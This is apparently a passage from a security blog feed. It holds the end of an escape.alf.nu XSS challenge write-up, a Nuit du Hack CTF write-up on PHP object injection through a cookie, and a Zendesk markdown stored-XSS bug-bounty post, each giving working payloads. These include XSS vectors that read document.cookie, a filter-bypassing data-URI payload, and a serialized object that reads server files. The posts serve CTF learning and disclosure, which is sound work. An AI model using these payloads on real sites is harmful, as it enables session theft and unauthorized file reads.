highlighter-rouge">"+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])())//</code></p> <p>I am not sure of any other ways to solve this. If you know a shorted method, please do comment on this post and let us discuss (I have seen some but was a bit difficult to understand) :)</p> <h4 id="level-10">Level 10:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="kd">function</span> <span class="nx">htmlEscape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">s</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/./g</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">x</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">&lt;</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">&amp;lt;</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">&gt;</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">&amp;gt;</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">&amp;</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">&amp;amp;</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">"</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">&amp;quot;</span><span class="dl">'</span><span class="p">,</span> <span class="dl">"</span><span class="s2">'</span><span class="dl">"</span><span class="p">:</span> <span class="dl">'</span><span class="s1">&amp;#39;</span><span class="dl">'</span> <span class="p">}[</span><span class="nx">x</span><span class="p">]</span> <span class="o">||</span> <span class="nx">x</span><span class="p">;</span> <span class="p">});</span> <span class="p">}</span> <span class="kd">function</span> <span class="nx">expandTemplate</span><span class="p">(</span><span class="nx">template</span><span class="p">,</span> <span class="nx">args</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">template</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span> <span class="sr">/{</span><span class="se">(\w</span><span class="sr">+</span><span class="se">)</span><span class="sr">}/g</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">_</span><span class="p">,</span> <span class="nx">n</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">htmlEscape</span><span class="p">(</span><span class="nx">args</span><span class="p">[</span><span class="nx">n</span><span class="p">]);</span> <span class="p">});</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">expandTemplate</span><span class="p">(</span> <span class="dl">"</span><span class="s2"> </span><span class="se">\n\</span><span class="s2"> &lt;h2&gt;Hello, &lt;span id=name&gt;&lt;/span&gt;!&lt;/h2&gt; </span><span class="se">\n\</span><span class="s2"> &lt;script&gt; </span><span class="se">\n\</span><span class="s2"> var v = document.getElementById('name'); </span><span class="se">\n\</span><span class="s2"> v.innerHTML = '&lt;a href=#&gt;{name}&lt;/a&gt;'; </span><span class="se">\n\</span><span class="s2"> &lt;</span><span class="se">\</span><span class="s2">/script&gt; </span><span class="se">\n\</span><span class="s2"> </span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span> <span class="na">name</span> <span class="p">:</span> <span class="nx">s</span> <span class="p">}</span> <span class="p">);</span> <span class="p">}</span></code></pre></figure> <p>This one comes inside the script context with quotes and angle brackets filtered. But one thing to note here is that the backslash is not escaped. So the easiest way here is to hex encode.</p> <p>Payload: <code class="language-plaintext highlighter-rouge">\u003cimg src=a onerror=alert(1)\u003e</code></p> <h4 id="level-11">Level 11:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Spoiler for level 2</span> <span class="nx">s</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">s</span><span class="p">).</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&lt;</span><span class="se">\/</span><span class="sr">script/gi</span><span class="p">,</span> <span class="dl">''</span><span class="p">);</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">&lt;script&gt;console.log(</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">s</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">);&lt;/script&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>This one is easy as the filter they use is most common one that we can see around. After the injection, we need the word <code class="language-plaintext highlighter-rouge">script</code>.</p> <p>Payload: <code class="language-plaintext highlighter-rouge">&lt;/&lt;/scriptscript&gt;&lt;script&gt;alert(1)//</code></p> <h4 id="level-12">Level 12:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Pass inn "callback#userdata"</span> <span class="kd">var</span> <span class="nx">thing</span> <span class="o">=</span> <span class="nx">s</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="sr">/#/</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="sr">/^</span><span class="se">[</span><span class="sr">a-zA-Z</span><span class="se">\[\]</span><span class="sr">'</span><span class="se">]</span><span class="sr">*$/</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">thing</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">Invalid callback</span><span class="dl">'</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">obj</span> <span class="o">=</span> <span class="p">{</span><span class="dl">'</span><span class="s1">userdata</span><span class="dl">'</span><span class="p">:</span> <span class="nx">thing</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="p">};</span> <span class="kd">var</span> <span class="nx">json</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">obj</span><span class="p">).</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">\/</span><span class="sr">/g</span><span class="p">,</span> <span class="dl">'</span><span class="se">\\</span><span class="s1">/</span><span class="dl">'</span><span class="p">);</span> <span class="k">return</span> <span class="dl">"</span><span class="s2">&lt;script&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">thing</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">(</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">json</span> <span class="o">+</span><span class="dl">"</span><span class="s2">)&lt;/script&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>This is quite similar to the one we saw before but with an exception that this time backslashes are escaped making it difficult for us to comment the rest of the string. Well, just use <code class="language-plaintext highlighter-rouge">&lt;!--</code> :P</p> <p>Payload: <code class="language-plaintext highlighter-rouge">'#';alert(1)&lt;!--</code></p> <h4 id="level-13">Level 13:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">tag</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">iframe</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// For this one, you get to run any code you want, but in a "sandboxed" iframe.</span> <span class="c1">//</span> <span class="c1">// http://print.alf.nu/?html=... just outputs whatever you pass in.</span> <span class="c1">//</span> <span class="c1">// Alerting from print.alf.nu won't count; try to trigger the one below.</span> <span class="nx">s</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">&lt;script&gt;</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">s</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">&lt;</span><span class="se">\</span><span class="s1">/script&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="nx">tag</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">http://print.alf.nu/?html=</span><span class="dl">'</span> <span class="o">+</span> <span class="nb">encodeURIComponent</span><span class="p">(</span><span class="nx">s</span><span class="p">);</span> <span class="nb">window</span><span class="p">.</span><span class="nx">WINNING</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="nx">youWon</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span> <span class="p">};</span> <span class="nx">tag</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="nx">youWon</span><span class="p">)</span> <span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">};</span> <span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">tag</span><span class="p">);</span> <span class="p">}</span></code></pre></figure> <p>I took quite sometime to understand this challenge but its almost clear for me (I had to read some writeups already written to understand this). The main point to understand here is that</p> <blockquote> <p>if an iframe defines its window.name to <code class="language-plaintext highlighter-rouge">youWon</code>, then the new name will be injected in the parent’s global window object which inturn sets the <code class="language-plaintext highlighter-rouge">youWon</code> variable and it leads to the call of <code class="language-plaintext highlighter-rouge">alert(1)</code>.</p> </blockquote> <p>You can also see that what ever we give as input to print.alf.nu, it gets reflected back in the response which makes our tasks easier !</p> <p>Payload: <code class="language-plaintext highlighter-rouge">name='youWon'</code></p> <p>I still haven’t properly understood the last 2 levels of these challenges. I will update the page once I clearly understand how it can be solved. Thanks for the read and let me know if there are any comments !</p> Fri, 17 Jun 2016 00:00:00 -0700 https://blog.0daylabs.com/2016/06/17/escape-alf-nu-XSS-writeup-part-1/ https://blog.0daylabs.com/2016/06/17/escape-alf-nu-XSS-writeup-part-1/ webchallenges xss PHP object Injection via Cookie unserialize() - Nuit du hack CTF Web 100 writeup <p>After a small break, I decided to participate in CTFs again and I am extremely happy about it. Nuit du CTF 2016 was a good one with couple of nice challenges ! Lets start with Web 100.</p> <p>We are greeted with a sign up page where we can input a username and age. Then it took us onto a login page where we can enter the username and it logs us in. All the input fields are clean (no injections of any type was possible). But there was an interesting cookie named <code class="language-plaintext highlighter-rouge">cook</code> with a value <code class="language-plaintext highlighter-rouge">Tzo0OiJVc2VyIjoyOntzOjM6ImFnZSI7aToxMDtzOjQ6Im5hbWUiO3M6MzoibG9sIjt9</code> which looked really suspicious ! Base64 decoding the value gives the result <code class="language-plaintext highlighter-rouge">O:4:"User":2:{s:3:"age";i:10;s:4:"name";s:3:"lol";}</code>. That looks pretty much like serialized data. So probably to check the requests, they will be unserializing the cookies which could be vulnerable.</p> <p>But in order for a successful attack, we need to get the class name so that we can use it to construct a proper payload. So I started digging if there is a way we can get the source code and it took sometime to find out there was a <strong>/git/</strong> directory. Cloning the git and resetting to the HEAD (<code class="language-plaintext highlighter-rouge">git reset --hard HEAD</code>) I got the files needed. It contains 3 major files named <strong>userclass.php</strong>, <strong>fileclasse.php</strong> and <strong>ufhkistgfj.php</strong>. The latter file contains the flag (in the server) which we should read. The fileclasse.php looks very interesting:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="kd">class</span> <span class="nc">FileClass</span> <span class="p">{</span> <span class="k">public</span> <span class="nv">$filename</span> <span class="o">=</span> <span class="s1">'error.log'</span><span class="p">;</span> <span class="k">public</span> <span class="k">function</span> <span class="n">__toString</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="n">filename</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="cp">?&gt;</span></code></pre></figure> <p>So essentially it reads the files for us which is exactly what we want. Lets construct the serialized data:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="k">require</span><span class="p">(</span><span class="s2">"./fileclasse.php"</span><span class="p">);</span> <span class="nv">$foo</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">User</span><span class="p">();</span> <span class="nb">file_put_contents</span><span class="p">(</span><span class="s2">"./serialized.txt"</span><span class="p">,</span> <span class="nb">serialize</span><span class="p">(</span><span class="nv">$foo</span><span class="p">));</span> <span class="cp">?&gt;</span></code></pre></figure> <p>Now the contents inside the file <strong>serialized.txt</strong> will look like this: <code class="language-plaintext highlighter-rouge">O:9:"FileClass":1:{s:8:"filename";s:9:"error.log";}</code>. We want to read the file named <code class="language-plaintext highlighter-rouge">ufhkistgfj.php</code>. So lets modify the payload a bit so that it can read ufhkistgfj.php which looks like this: <code class="language-plaintext highlighter-rouge">O:9:"FileClass":1:{s:8:"filename";s:14:"ufhkistgfj.php";}</code>. Now lets base64 encode it and sent it through cookies. We can get the flag in the response !!</p> <p>For those who have no idea about <strong>unserialize()</strong> vulnerabilities, read on:</p> <h2 id="deserialize">(de)serialize():</h2> <p>serialize() basically converts an object into a string. So you can guess what unserialize does (it converts back serialized data into objects). When user controlled data passes through unserialize() without sanitization, it can lead to various vulnerabilities from reading local files to remote code execution. For a successful exploitation, 2 conditions has to be met:</p> <ol> <li>All classes used for the attack should be declared and imported properly.</li> <li>The application must have a class which implements a PHP magic method (__wakeup(), __sleep(), __toString() etc..)</li> </ol> <p>The above conditions are satisfied in our cases (The class we need is <code class="language-plaintext highlighter-rouge">FileClass</code> which is already defnined and it contains a magic function __toString). Let us take the above example and try to understand (reading arbitrary files).There is a user class called “Users” defined in userclass.php:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="kd">class</span> <span class="nc">User</span> <span class="p">{</span> <span class="c1">// Class data</span> <span class="k">public</span> <span class="nv">$age</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">public</span> <span class="nv">$name</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span> <span class="c1">// Allow object to be used as a String</span> <span class="k">public</span> <span class="k">function</span> <span class="n">__toString</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="s1">'Hello '</span> <span class="mf">.</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="n">name</span> <span class="mf">.</span> <span class="s1">' you have '</span> <span class="mf">.</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="n">age</span> <span class="mf">.</span> <span class="s1">' years old. &lt;br /&gt;'</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="cp">?&gt;</span></code></pre></figure> <p>This class is imported to <strong>index.php</strong> and using the incoming data from the user, it creates a serialized cookie string:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="nv">$form2</span><span class="o">=</span><span class="kc">false</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"name"</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="k">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"age"</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'name'</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'age'</span><span class="p">]))</span> <span class="p">{</span> <span class="nv">$form</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span> <span class="nv">$name</span><span class="o">=</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'name'</span><span class="p">];</span> <span class="nv">$age</span><span class="o">=</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'age'</span><span class="p">];</span> <span class="nv">$a</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">User</span><span class="p">();</span> <span class="nv">$a</span><span class="o">-&gt;</span><span class="n">age</span> <span class="o">=</span> <span class="nv">$age</span><span class="p">;</span> <span class="nv">$a</span><span class="o">-&gt;</span><span class="n">name</span> <span class="o">=</span> <span class="nv">$name</span><span class="p">;</span> <span class="nv">$form2</span><span class="o">=</span><span class="kc">true</span><span class="p">;</span> <span class="nb">setcookie</span><span class="p">(</span><span class="s2">"cook"</span><span class="p">,</span> <span class="nb">base64_encode</span><span class="p">(</span><span class="nb">serialize</span><span class="p">(</span><span class="nv">$a</span><span class="p">)),</span> <span class="nb">time</span><span class="p">()</span><span class="o">+</span><span class="mi">3600</span><span class="p">,</span> <span class="s2">"/"</span><span class="p">,</span><span class="s2">""</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nv">$form</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span> <span class="nv">$message</span> <span class="o">=</span> <span class="s1">'Put your name &amp; age please.'</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>So basically a new object named <code class="language-plaintext highlighter-rouge">a</code> is created using which they set the age and name attributes from the incoming user input data. Then the variable is serialized() and is set as cookie with 1 hour expiry. The serialized data looks like this:</p> <p><code class="language-plaintext highlighter-rouge">O:4:"User":2:{s:3:"age";i:10;s:4:"name";s:3:"lol";}</code></p> <p><code class="language-plaintext highlighter-rouge">O:&lt;class_name_length&gt;:"&lt;class_name&gt;":&lt;number_of_properties&gt;:{&lt;properties&gt;};</code></p> <p>Now lets look into <strong>result.php</strong> where <code class="language-plaintext highlighter-rouge">unserialize($_COOKIE['cook'])</code> happens:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="k">include</span><span class="p">(</span><span class="s1">'./userclass.php'</span><span class="p">);</span> <span class="k">include</span><span class="p">(</span><span class="s1">'./fileclasse.php'</span><span class="p">);</span> <span class="nb">session_start</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s2">"cook"</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s2">"cook"</span><span class="p">])){</span> <span class="nv">$obj</span> <span class="o">=</span> <span class="nb">unserialize</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">'cook'</span><span class="p">]));</span> <span class="nb">ob_start</span><span class="p">();</span> <span class="k">echo</span> <span class="nv">$obj</span><span class="p">;</span> <span class="nv">$ff</span> <span class="o">=</span> <span class="nv">$obj</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">;</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"name_2"</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'name_2'</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="nv">$ff</span><span class="o">==</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'name_2'</span><span class="p">])</span> <span class="p">{</span> <span class="cp">?&gt;</span></code></pre></figure> <p>You can see that the cookie gets unserialize() and saved into a variable (now object) called <code class="language-plaintext highlighter-rouge">$obj</code>. It is also getting reflected into the output which means if we can get it to read files, it will automatically echo us the file contents. Here it is important to note that they are also importing <code class="language-plaintext highlighter-rouge">fileclasse.php</code> which basically reads <strong>error.log</strong>. But since we can send serialized data via cookies, we will change the cookie data to read files using the <code class="language-plaintext highlighter-rouge">fileclasse.php</code>. So lets write a simple script which serializes the data for us using fileclasse.php:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="k">require</span><span class="p">(</span><span class="s2">"./fileclasse.php"</span><span class="p">);</span> <span class="nv">$foo</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">FileClass</span><span class="p">();</span> <span class="nb">file_put_contents</span><span class="p">(</span><span class="s2">"./serialized.txt"</span><span class="p">,</span> <span class="nb">serialize</span><span class="p">(</span><span class="nv">$foo</span><span class="p">));</span> <span class="cp">?&gt;</span></code></pre></figure> <p>Running the above script will return us the string <code class="language-plaintext highlighter-rouge">O:9:"FileClass":1:{s:8:"filename";s:9:"error.log";}</code> but we want to read <code class="language-plaintext highlighter-rouge">ufhkistgfj.php</code> and not error.log. So simply modify the serialized data to the filename we want and make sure you change the length accordingly. So final payload becomes: <code class="language-plaintext highlighter-rouge">O:9:"FileClass":1:{s:8:"filename";s:14:"ufhkistgfj.php";}</code>. Lets Base64 encode it and place it as the cookie value. Refresh the page (Best to use burpsuite to see the response) and in the response you can get the contents of the file.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HTTP/1.1 302 Found Date: Sun, 03 Apr 2016 08:18:57 GMT Server: Apache/2.4.10 (Debian) PHP/5.6.19 X-Powered-By: PHP/5.6.19 Expires: Tue, 01 Jan 1971 02:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache location: index.php Content-Length: 166 Content-Type: text/html; charset=UTF-8 &lt;?php if($_COOKIE["cook"]==Tzo5OiJGaWxlQ2xhc3MiOjE6e3M6ODoiZmlsZW5hbWUiO3M6MTQ6InVmaGtpc3RnZmoucGhwIjt9){ echo "NDH[bsnae6PcNyrWZ82Q8v6pfJ6C6HG433L6]"; } ?&gt; </code></pre></div></div> <p>You can see the file content in the response !</p> <h2 id="references">References:</h2> <p>These are some of the awesome references you can use to learn more about PHP object Injection and unserialize():</p> <ol> <li><a href="https://www.insomniasec.com/downloads/publications/Practical%20PHP%20Object%20Injection.pdf">Practical PHP Object Injection </a></li> <li><a href="https://www.notsosecure.com/remote-code-execution-via-php-unserialize/">Remote code execution via PHP [Unserialize]</a></li> </ol> Sun, 03 Apr 2016 00:00:00 -0700 https://blog.0daylabs.com/2016/04/03/unserialize-php-object-injection/ https://blog.0daylabs.com/2016/04/03/unserialize-php-object-injection/ ctf Markdown based Stored XSS in Zendesk ! <p>It all started after reading a bug report <a href="https://hackerone.com/reports/82725">#82725</a> on hackerone, where an attacker can exploit markdown comment syntax by embedding malicious JavaScript. So the original bug report was to create malicious comments which when clicked can execute JavaScript, which looks like this:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="p">[</span><span class="nx">clickme</span><span class="p">](</span><span class="nx">javascript</span><span class="p">:</span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span></code></pre></figure> <p>Now that was a simple markdown XSS and I was disappointed as I was not the one to find it first. So I decided to play with the same bug and see if I can come up with a bypass for it. But unfortunately, things were not as easy as it looked. Zendesk team did a good work fixing it and no matter what I tried, it didn’t work. Then I came across an <a href="http://shubh.am/exploiting-markdown-syntax-and-telescope-persistent-xss-through-markdown-cve-2014-5144/" target="_blank">awesome blog</a> by Shubham Shah where he explains a lot of good markdown based XSS vectors which includes:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="p">[</span><span class="nx">clickme</span><span class="p">](</span><span class="nx">javascript</span><span class="p">:</span><span class="nx">prompt</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">))</span> <span class="p">[</span><span class="nx">clickme</span><span class="p">](</span><span class="nx">j</span> <span class="nx">a</span> <span class="nx">v</span> <span class="nx">a</span> <span class="nx">s</span> <span class="nx">c</span> <span class="nx">r</span> <span class="nx">i</span> <span class="nx">p</span> <span class="nx">t</span><span class="p">:</span><span class="nx">prompt</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">))</span> <span class="o">!</span><span class="p">[</span><span class="nx">clickme</span><span class="p">](</span><span class="nx">javascript</span><span class="p">:</span><span class="nx">prompt</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">))</span><span class="o">\</span> <span class="o">&lt;</span><span class="nx">javascript</span><span class="p">:</span><span class="nx">prompt</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="o">&gt;</span> <span class="o">&lt;&amp;</span><span class="err">#</span><span class="nx">x6A</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x61</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x76</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x61</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x73</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x63</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x72</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x69</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x70</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x74</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x3A</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x61</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x6C</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x65</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x72</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x74</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x28</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x27</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x58</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x53</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x53</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x27</span><span class="o">&amp;</span><span class="err">#</span><span class="nx">x29</span><span class="o">&gt;</span></code></pre></figure> <p>But none of the above seemed to be working (Zendesk filters are good !). I was about to stop looking, but suddenly something crossed my mind. The original report was based on XSS vectors which starts with <code class="language-plaintext highlighter-rouge">javascript:</code> which they obviously blocked with a strong filter after the bug was resolved. So I should be looking for a payload which can trigger JavaScript but should not use the word <code class="language-plaintext highlighter-rouge">javascript</code> inside the payload. Can you guess a payload (it’s so easy ) ?</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="p">[</span><span class="nx">clickme</span><span class="p">](</span><span class="nx">data</span><span class="p">:</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span><span class="nx">base64</span><span class="p">,</span><span class="nx">PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K</span><span class="p">)</span></code></pre></figure> <p>I knew this, but it never crossed my mind until I read Shubham’s blog. The simple base64 payload with <code class="language-plaintext highlighter-rouge">data:text/html;base64</code> executes properly in any browser. As the last report was fixed by filtering out the keyword <code class="language-plaintext highlighter-rouge">javascript</code> and not all generic markdown based XSS, I bypassed their existing filters and triggered an XSS using the above payload(A very simple one right ?).</p> <p>Zendesk team was kind enough to pay me $500 for the report.</p> Mon, 15 Feb 2016 00:00:00 -0800 https://blog.0daylabs.com/2016/02/15/stored-xss-on-zendesk/ https://blog.0daylabs.com/2016/02/15/stored-xss-on-zendesk/ bugbounty How I got a shell on Google Acquisition ? <p>Getting a place on <a href="https://www.google.com/about/appsecurity/hall-of-fame/archive/" target="_blank">Google hall of fame</a> is a milestone for any bug bounty hunter. With this in mind, I started reading Google’s Vulnerability Reward Program and noticed that all the Google Acquisitions are a part of the program once 